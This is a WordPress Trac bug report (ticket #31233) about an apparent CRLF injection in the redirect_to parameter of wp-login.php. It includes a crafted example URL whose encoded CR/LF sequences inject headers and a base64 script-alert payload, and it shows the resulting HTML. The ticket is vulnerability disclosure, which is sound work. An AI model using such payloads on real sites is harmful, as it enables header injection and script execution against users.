[wp-trac] [WordPress Trac] #31233: HTTP Header CRLF Injection (HTTP Response Splitting) wp-login.php

Wed Feb 4 17:37:10 UTC 2015

#31233: HTTP Header CRLF Injection (HTTP Response Splitting) wp-login.php
------------------------------------+-----------------------------
 Reporter:  roadrashtx              |      Owner:
     Type:  defect (bug)            |     Status:  new
 Priority:  normal                  |  Milestone:  Awaiting Review
Component:  Login and Registration  |    Version:  4.1
 Severity:  normal                  |   Keywords:
  Focuses:                          |
------------------------------------+-----------------------------
 Our security team did some scanning of our blogs and found the following:

 By using a carriage return-linefeed sequence, an attacker can add HTTP
 headers to the response and completely write the body of the HTTP request.

 '''Example''': http://wordpressdomain/wp-login.php?redirect_to=Content-
 Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d
 %0aContent-Location:foo%0d%0aContent-Transfer-
 Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&reauth=1

 '''Result''': in the source code you will see the %0D %0A (URL encoded
 <CR> and <LF>) is successful injected.

 <input type="hidden" name="redirect_to" value="Content-Type:
 multipart/related; boundary=_AppScan
 --_AppScan
 Content-Location:foo
 Content-Transfer-Encoding:base64

 PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
 " />

--
Ticket URL: <https://core.trac.wordpress.org/ticket/31233>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform